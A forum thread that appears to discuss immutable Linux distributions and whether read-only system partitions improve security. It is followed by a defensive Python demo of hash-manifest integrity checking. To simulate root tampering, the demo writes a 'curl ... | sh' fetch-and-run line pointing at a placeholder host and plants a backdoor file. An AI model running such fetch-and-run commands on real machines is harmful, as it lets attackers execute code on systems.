Introduction to immutable Linux systems

Mildly NixOS related :slight_smile:


Awesome! Thank you.

One detail:

  • package changes are applied on the next boot
  • having to reboot after a change is annoying.

I’m pretty sure I often make changes to NixOS packages without rebooting!


I’ll make it clearer that this is the general “con”, but that NixOS is doing things correctly so it’s not annoying.


Having to reboot after package installation seems very annoying to me. But I assume the main use case here is not laptop / workstation use, but servers running in the cloud or something. Servers running container workloads perhaps?


Not really: Silverblue is meant to be used for workstations, same for Vanilla OS, and MicroOS to some extent.

That’s why they provide devtool / distrobox, you are supposed to manage the software you need using rootless containers. That’s also something NixOS handles natively, a nix-shell or nix profile…


I don’t understand the benefit of this way of working (I am now talking about the distributions other than NixOS). I used to be on openSUSE and switched to NixOS only recently. It seems that in the future they will switch entirely to this type of distribution. As a workstation user, the downside seems much larger than the upside. I thought it was a price to pay for their approach to security and provenance, which may make sense for server workloads in certain enterprise contexts. But as a workstation user, I think the NixOS approach will be more convenient.


In any case, this was a well written and interesting article! Thank you!

Android works like this too. It’s working fine, but the whole ecosystem was built in this environment since the beginning, so there is not much friction.

Maybe they want to enforce an android style approach, and this is a way. Motivating users to use flatpak or rootless containers instead of having to touch the system itself.

The whole idea is interesting, one should let the system handle the boot, the display, drivers etc… and everything that isn’t used to make the computer in a working state should be done in user land. But we are far from that! :frowning:


Thanks, good write-up intro about immutable Linux systems!

In my view (and I dabbled only a little in Silverblue and MicroOS), the only reason Silverblue makes sense (and in that space it makes a lot of sense) is on “kiosk”-like computers, where no customization is wanted (and of course no customization is needed in terms of drivers or whatnot).

MicroOS is a good system, but… I see it as a normal system with just RO partitions (discarding here the purpose of being for containers). Particularly, Tumbleweed can be made an immutable system by installing the “transactional server” role.

NixOS is NixOS (and Guix), and I also think it’s the right way to do things. Although, and this is off-topic, I am seeing a lot of marketing kind of like “NixOS is the new Arch”, and I really don’t like it. It’s better to be honest about it, say the pros and the cons… and not have this “it’s the holy grail” hype. Similar to how Silverblue is “The Future” hype in lots of places I read (or maybe I am reading the wrong places :slight_smile:).

Thanks for mentioning something that puzzles me too, which is why immutability = security. I don’t get it: breaking immutability in Silverblue is one ostree param away (I don’t remember the exact name, but there is a param to make changes live, making it temporarily RW). In MicroOS, it is a matter of marking the btrfs snapshot RW. On NixOS, it is a `mount -o remount,rw /nix/store` away… If a hacker can get root, making the RO into RW is the easiest step.
At least something like “the kernel, before opening a file, would check the package shasum and verify that it is correct”… it could still be hackable, but much, much harder.

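The distinction drawn in the post above, between a read-only bit that root can flip back and a hash check at file open that root cannot simply switch off, is the difference between immutability and integrity verification. As an added example (not code from the original thread, and not how Silverblue, MicroOS or NixOS implement anything), the Python script below does in user space what fs-verity, dm-verity or IMA appraisal do in the kernel: it builds a hash manifest of a constructed sample file tree, authenticates the manifest with a key that is assumed to live outside the attacker’s reach, and shows that a root attacker can undo the read-only mode bits and rewrite a file, but cannot produce a manifest that still verifies. All paths, file contents and the key are constructed for the example.

```python
"""Immutability vs. integrity: a read-only bit is policy, a keyed hash manifest is evidence.

Added example; the sample tree, paths and key are constructed and not from any real system.
"""
from __future__ import annotations

import hashlib
import hmac
import json
import os
import tempfile
from pathlib import Path

# Constructed sample "system image" contents; not taken from any real distribution.
SAMPLE_TREE = {
    "usr/bin/sh": b"#!/bin/sh\necho hello\n",
    "usr/lib/libexample.so": b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"fake-library-body",
    "etc/os-release": b'NAME="ExampleOS"\nID=exampleos\n',
}

# Hypothetical appraisal key. In a real design the verifying key (or dm-verity root hash)
# is baked into a boot chain the running system cannot rewrite, so a root attacker
# cannot re-sign a manifest after tampering. Here it is just a constant for the demo.
APPRAISAL_KEY = b"example-appraisal-key"


def write_tree(root: Path, files: dict[str, bytes], read_only: bool = True) -> None:
    """Materialise the sample tree and mark every file read-only (mode 0444)."""
    for rel, data in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(data)
        if read_only:
            path.chmod(0o444)


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Relative path -> sha256 for every regular file under root."""
    return {
        str(p.relative_to(root)).replace(os.sep, "/"): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def sign_manifest(manifest: dict[str, str], key: bytes) -> str:
    """HMAC over a canonical encoding; stands in for the signature of a verified-boot chain."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def appraise(root: Path, manifest: dict[str, str], tag: str, key: bytes) -> list[str]:
    """Return findings; an empty list means the tree matches the authenticated manifest."""
    if not hmac.compare_digest(sign_manifest(manifest, key), tag):
        return ["manifest: bad signature"]
    findings = []
    present = build_manifest(root)
    for rel, expected in manifest.items():
        actual = present.get(rel)
        if actual is None:
            findings.append(f"missing: {rel}")
        elif actual != expected:
            findings.append(f"modified: {rel}")
    for rel in present:
        if rel not in manifest:
            findings.append(f"unlisted: {rel}")
    return sorted(findings)


def tamper_as_root(path: Path, data: bytes) -> None:
    """What root does to a 'read-only' file: flip the bit, write, flip it back."""
    path.chmod(0o644)
    path.write_bytes(data)
    path.chmod(0o444)


def demo() -> dict[str, list[str]]:
    """Run three scenarios in a scratch directory and return the appraisal findings of each."""
    results: dict[str, list[str]] = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "image"
        write_tree(root, SAMPLE_TREE)
        manifest = build_manifest(root)
        tag = sign_manifest(manifest, APPRAISAL_KEY)

        results["clean"] = appraise(root, manifest, tag, APPRAISAL_KEY)

        # 1. Read-only mode bits (or an RO remount) stop nothing once the attacker is root,
        #    but the hashes no longer match the authenticated manifest.
        tamper_as_root(root / "usr/bin/sh", b"#!/bin/sh\ncurl http://example.invalid/x | sh\n")
        (root / "usr/bin/.backdoor").write_bytes(b"persistence")
        results["tampered"] = appraise(root, manifest, tag, APPRAISAL_KEY)

        # 2. The attacker regenerates the on-disk manifest to match the tampered tree;
        #    without the key the old tag no longer verifies, so the swap is caught.
        forged = build_manifest(root)
        results["forged_manifest"] = appraise(root, forged, tag, APPRAISAL_KEY)
    return results


if __name__ == "__main__":
    for name, findings in demo().items():
        print(f"{name}: {findings or 'OK'}")
```

The part that matters is where `tag` and `APPRAISAL_KEY` live. If the manifest and its signature sit on the same writable disk, a root attacker who can remount `/nix/store` or flip a btrfs snapshot to RW can just as easily rewrite the manifest, and the check is worth no more than the RO bit it was meant to back up. Real deployments anchor the root of trust outside the running system: dm-verity takes its root hash from the kernel command line of a signed boot image, and IMA appraisal and fs-verity check signatures against keys in the kernel keyring, so the attacker would have to defeat the boot chain rather than run one remount command.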